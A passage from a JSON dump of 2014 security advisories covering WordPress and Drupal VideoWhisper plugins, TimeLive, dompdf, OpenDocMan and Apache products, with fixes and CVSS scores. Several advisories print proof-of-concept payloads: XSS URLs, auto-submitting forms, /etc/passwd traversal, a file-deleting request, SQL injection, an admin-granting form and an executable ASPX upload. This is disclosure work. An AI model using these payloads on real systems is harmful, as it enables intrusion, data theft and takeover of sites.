remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n \r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of "/etc/passwd" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php" script. A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file "/tmp/immuniweb":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file "/tmp/immuniweb" exists on the system.\r\n\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:52", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1907", "CVE-2014-1906", "CVE-2014-1905", "CVE-2014-1908"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30589", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30589", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "references": [], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0111: Remote code execution by an authenticated administrator\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nSyncope 1.0.0 to 1.0.8\r\nSyncope 1.1.0 to 1.1.6\r\n\r\nDescription:\r\nIn the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings) a malicious administrator can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core.\r\n\r\nCredit:\r\nThis issue was discovered by Gregory Draperi.\r\n\r\nReferences:\r\nhttp://syncope.apache.org/security.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTTOJyAAoJEGtDE+0nPfKHxWcIAI9POTzr4bIF7fXO25uXgfny\r\nBO8SR0fmGScdmeohf8nQZbUNgKA1F7YRe5vC9r8nKFSpdDJrMnPSTOwMYrgdOxHt\r\nRl/SpEab4b8NX0FO1a6TObDbXBDj+Q+4cNUXOOc0jC7lU67n1SorfGaMbjLfcZ0w\r\n2xnZsbAQ0P0bmIJ2mR+LuXLsEA3kwvClF9fUTEDlJ4Rm/yT16UGvD5+vEJdMQzen\r\nJhBdT8VeX4wvtYr9+WmmWqeWgvSmezE07s5Pu36qXkxAEFGzdQBtJ/XJbpbgM7Sa\r\n7MoZQHQqJ5VwUVGMseqcxhAjD065uHP41HpAeF4TFQvp4jg8/FiybFdXqiJ+smI=\r\n=4XQi\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "[SECURITY] CVE-2014-0111 Apache Syncope", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:52", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-0111"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30593", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30593", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nVulnerability title: Unrestricted file upload in Livetecs Timelive\r\nCVE: CVE-2014-2042\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.5.1\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was discovered that it was possible for low-level TimeLive\r\napplication users to upload\r\nfiles (by using the "My Projects".."Manage Project" functionality).\r\nThere was no restriction on\r\nfile types that could be uploaded and the permissions applied to those\r\nuploaded files included\r\n"Read and Execute".\r\n\r\n1. Using any text editor create a new file "run-cacl.aspx" and add the\r\nfollowing content:\r\n\r\n<%@ Page Language="VB" %>\r\n <%\r\n System.Diagnostics.Process.Start("calc.exe")\r\n %>\r\n\r\n2. Login to the TimeLive application as a low-level (standard) user\r\n3. Click "My Projects" from the left-hand menu\r\n4. Click the "Manage" icon - It looks like a notepad and pen\r\n5. Scroll to the bottom of the page that opens and click "Attachment"\r\n6. Click "Browse" and navigate to to where you saved "run-cacl.exe"\r\n7. Click "Upload"\r\n8. Logout of TimeLive [Optional]\r\n9. On the server hosting the TimeLive application run "TaskMgr"\r\n9. Browse to http://MyTimeLiveURL/Uploads/1/1/run-cacl.aspx\r\n10. Observe "calc.exe" running as "NETWORK_SERVICE" in the Task manager\r\nNote: Depending on the configuration of the TimeLive application used\r\nfor testing it may be\r\nnecessary to change the "1/1" part of the URL.\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2042/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "CVE-2014-2042 - Unrestricted file upload in Livetecs Timelive", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-2042"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30561", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30561", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nCVE-2013-2251: Apache Archiva Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nApache Archiva is affected by a vulnerability in the version of the Struts library being used, which allows a malicious user to run code on the server remotely. More details about the vulnerability can be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Archiva Remote Command Execution", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30568", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nCVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Archiva 1.3 to Continuum 1.3.6\r\n- The unsupported versions Archiva 1.2 to 1.2.2 are also affected.\r\n\r\nDescription:\r\nA request that included a specially crafted request parameter could be used to inject arbitrary HTML or Javascript into the Archiva home page.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Archiva 2.0.1 or Archiva 1.3.8, which are not affected by this issue.\r\n\r\nArchiva 2.0.0 and later is not affected by this issue.\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "[SECURITY] CVE-2013-2187: Apache Archiva Cross-Site Scripting vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2187"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30567", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30567", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nVulnerability title: Arbitrary file read in dompdf\r\nCVE: CVE-2014-2383\r\nVendor: dompdf\r\nProduct: dompdf\r\nAffected version: v0.6.0\r\nFixed version: v0.6.1 (partial fix)\r\nReported by: Alejo Murillo Moyas\r\n\r\nDetails:\r\nAn arbitrary file read vulnerability is present on dompdf.php file that\r\nallows remote or local attackers to read local files using a special\r\ncrafted argument. This vulnerability requires the configuration flag\r\nDOMPDF_ENABLE_PHP to be enabled (which is disabled by default).\r\n\r\nUsing PHP protocol and wrappers it is possible to bypass the dompdf's\r\n"chroot" protection (DOMPDF_CHROOT) which prevents dompdf from accessing\r\nsystem files or other files on the webserver. Please note that the flag\r\nDOMPDF_ENABLE_REMOTE needs to be enabled.\r\n\r\nCommand line interface:\r\nphp dompdf.php\r\nphp://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n\r\nWeb interface:\r\n \r\nhttp://example/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=<PATH_TO_THE_FILE>\r\n \r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "CVE-2014-2383 - Arbitrary file read in dompdf", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 2.1}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-2383"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30563", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30563", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nVulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper\r\nCVE: CVE-2014-2715\r\nVendor: VideoWhisper\r\nProduct: Videowhisper module for Drupal 7\r\nAffected version: 7\r\nFixed version: \r\nReported by: Mahmoud Ghorbanzadeh\r\n\r\nDetails:\r\n\r\nHello,\r\nI found Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). The vulnerability exist at line 2 and line 4 in drupal\modules\videowhisper\vwrooms\templates\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\modules\videowhisper\vwrooms\vwrooms.module.\r\n\r\nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script>\r\n\r\nVendor Notification: 18, Apr 2014\r\n \r\nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.\r\n\r\nBest Regards.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "[CVE-2014-2715] Cross-site scripting (XSS) vulnerability in Videowhisper", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-2715"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30559", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30559", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nVulnerability title: Unauthenticated access to sensitive information and\r\nfunctionality in Livetecs Timelive\r\nCVE: CVE-2014-1217\r\nVendor: Livetecs\r\nProduct: Timelive\r\nAffected version: 6.2.71\r\nFixed version: 6.2.8\r\nReported by: Richard Hatch\r\n\r\nDetails:\r\nIt was possible to access a URL that allowed unauthenticated access\r\nto sensitive configuration change functionality, and also revealed the\r\ndatabase connection\r\nstring (including authentication credentials) used by TimeLive to access\r\nthe database.\r\n\r\nThe following URL was identified:\r\nhttp://MyTimeLiveServer/home/systemsetting.aspx\r\n\r\nNote: This URL was identified by entering "timelive default credentials"\r\ninto the Google\r\nInternet search engine. At time of writing the URL was revealed by the\r\nfirst result returned\r\nby Google.\r\n\r\n\r\nFurther details at:\r\nhttps://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1217/\r\n\r\n\r\nCopyright:\r\nCopyright (c) Portcullis Computer Security Limited 2014, All rights\r\nreserved worldwide. Permission is hereby granted for the electronic\r\nredistribution of this information. It is not to be edited or altered in\r\nany way without the express written consent of Portcullis Computer\r\nSecurity Limited.\r\n\r\nDisclaimer:\r\nThe information herein contained may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties, implied or otherwise, with regard to this information\r\nor its use. Any use of this information is at the user's risk. In no\r\nevent shall the author/distributor (Portcullis Computer Security\r\nLimited) be held liable for any damages whatsoever arising out of or in\r\nconnection with the use or spread of this information.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "CVE-2014-1217 - Unauthenticated access to sensitive information and functionality in Livetecs Timelive", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1217"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30562", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30562", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:52", "references": [], "description": "\r\n\r\nCVE-2013-2251: Apache Continuum affected by Remote Command Execution\r\n\r\nSeverity: Important\r\n\r\nVendor: The Apache Software Foundation\r\n\r\nVersions Affected:\r\n- Continuum 1.3.1 to Continuum 1.4.1\r\n\r\nDescription:\r\nApache Continuum is affected by a vulnerability in the version of the Struts library being used,\r\nwhich allows a malicious user to run code on the server remotely. More details about the vulnerability\r\ncan be found at http://struts.apache.org/2.3.x/docs/s2-016.html.\r\n\r\nMitigation:\r\nAll users are recommended to upgrade to Continuum 1.4.2, which is not affected\r\nby this issue.\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-06-14T00:00:00", "title": "[SECURITY] CVE-2013-2251: Apache Continuum affected by Remote Command Execution", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:52", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30825", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30825", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "references": [], "description": "\r\n\r\nAdvisory ID: HTB23202\r\nProduct: OpenDocMan\r\nVendor: Free Document Management Software\r\nVulnerable Version(s): 1.2.7 and probably prior\r\nTested Version: 1.2.7\r\nAdvisory Publication: February 12, 2014 [without technical details]\r\nVendor Notification: February 12, 2014 \r\nVendor Patch: February 24, 2014 \r\nPublic Disclosure: March 5, 2014 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]\r\nCVE References: CVE-2014-1945, CVE-2014-1946\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.\r\n\r\n\r\n1) SQL Injection in OpenDocMan: CVE-2014-1945\r\n\r\nThe vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe exploitation example below displays version of the MySQL server:\r\n\r\nhttp://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9\r\n\r\n\r\n2) Improper Access Control in OpenDocMan: CVE-2014-1946\r\n\r\nThe vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating user\u2019s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.\r\n\r\nThe exploitation example below assigns administrative privileges for the current account:\r\n\r\n<form action="http://[host]/signup.php" method="post" name="main">\r\n<input type="hidden" name="updateuser" value="1">\r\n<input type="hidden" name="admin" value="1">\r\n<input type="hidden" name="id" value="[USER_ID]">\r\n<input type="submit" name="login" value="Run">\r\n</form>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to OpenDocMan v1.2.7.2\r\n\r\nMore Information:\r\nhttp://www.opendocman.com/opendocman-v1-2-7-1-release/\r\nhttp://www.opendocman.com/opendocman-v1-2-7-2-released/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.\r\n[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2014-05-04T00:00:00", "title": "Multiple Vulnerabilities in OpenDocMan", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:51", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-1946", "CVE-2014-1945"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30587", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30587", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2016-09-26T17:22:57", "references": ["https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15261: Apache Struts vulnerability CVE-2014-0112\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n", "reporter": "f5", "published": "2014-01-20T00:00:00", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SOL14933 - Apache Struts vulnerability CVE-2013-2251", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-16T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "id": "SOL14933", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:08", "references": ["https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", "https://support.f5.com/kb/en-us/solutions/public/14000/900/sol14933.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15262.html", "https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15241.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL14933: Apache Struts vulnerability CVE-2013-2251\n * SOL15260: Apache Struts vulnerability CVE-2014-0094\n * SOL15262: Apache Struts vulnerability CVE-2014-0113\n * SOL15241: Applying user-defined attack signatures to block malicious attacks on certain Apache Struts vulnerabilities\n", "reporter": "f5", "published": "2014-05-15T00:00:00", "title": "SOL15261 - Apache Struts vulnerability CVE-2014-0112", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2013-2251", "CVE-2014-0094", "CVE-2014-0113", "CVE-2014-0112"], "modified": "2014-05-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15261.html", "id": "SOL15261", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:09", "references": ["https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15260.html", 